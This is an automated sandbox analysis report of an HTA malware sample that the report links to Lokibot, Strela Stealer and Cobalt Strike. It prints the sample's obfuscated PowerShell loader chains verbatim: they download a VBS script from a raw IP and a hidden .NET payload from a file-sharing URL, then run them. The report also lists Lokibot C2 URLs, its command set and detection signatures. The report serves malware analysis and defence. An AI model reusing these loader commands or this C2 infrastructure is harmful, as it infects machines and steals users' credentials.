Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

Overview

General Information

Sample name:bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
Analysis ID:1556630
MD5:5476ba599869d81abee08f38f1c1a1d9
SHA1:46748779ec123145fdf90942c9df65d0099c9a99
SHA256:ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Lokibot
Yara detected Powershell download and execute
Yara detected Strela Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected aPLib compressed binary
Compiles C# or VB.Net code
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6676 cmdline: mshta.exe "C:\Users\user\Desktop\bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6884 cmdline: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 5104 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 4408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • aspnet_compiler.exe (PID: 2736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            Click to see the 21 entries
            SourceRuleDescriptionAuthorStrings
            9.2.powershell.exe.6a69e98.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              9.2.powershell.exe.6a69e98.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              9.2.powershell.exe.6a69e98.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              9.2.powershell.exe.6a69e98.0.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              9.2.powershell.exe.6a69e98.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              amsi32_5820.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 